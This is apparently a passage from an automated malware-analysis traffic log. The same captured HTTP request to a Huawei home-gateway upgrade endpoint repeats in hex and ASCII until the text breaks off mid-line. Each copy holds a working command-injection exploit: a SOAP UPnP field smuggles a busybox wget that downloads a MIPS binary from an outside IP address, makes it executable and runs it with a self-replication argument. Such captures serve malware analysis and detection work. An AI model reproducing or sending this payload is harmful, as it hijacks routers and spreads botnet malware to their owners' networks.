3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 